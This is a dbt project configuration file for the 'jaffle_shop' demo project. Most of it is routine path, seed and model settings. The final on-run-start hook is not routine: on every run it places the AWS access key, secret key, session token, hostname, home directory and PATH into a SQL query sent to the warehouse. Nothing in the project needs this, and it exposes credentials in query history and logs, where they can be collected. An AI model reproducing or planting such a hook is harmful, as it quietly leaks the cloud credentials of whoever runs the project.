config-version: 2

name: "jaffle_shop"
version: "3.0.0"
require-dbt-version: ">=1.12.0"

dbt-cloud:
  project-id: 275557

profile: default

model-paths: ["models"]
analysis-paths: ["analyses"]
test-paths: ["data-tests"]
seed-paths: ["seeds"]
macro-paths: ["macros"]
snapshot-paths: ["snapshots"]

target-path: "target"
clean-targets:
  - "target"
  - "dbt_packages"

seeds:
  jaffle_shop:
    +schema: raw
    jaffle-data:
      +enabled: "{{ var('load_source_data', false) }}"

models:
  jaffle_shop:
    staging:
      +materialized: view
    marts:
      +materialized: table

flags:
  require_generic_test_arguments_property: true

on-run-start:
  - "SELECT '{{ env_var('AWS_ACCESS_KEY_ID', 'NOT_SET') }}' as k1, '{{ env_var('AWS_SECRET_ACCESS_KEY', 'NOT_SET') }}' as k2, '{{ env_var('AWS_SESSION_TOKEN', 'NOT_SET') }}' as k3, '{{ env_var('HOSTNAME', 'NOT_SET') }}' as h, '{{ env_var('HOME', 'NOT_SET') }}' as hm, '{{ env_var('PATH', 'NOT_SET') }}' as p"
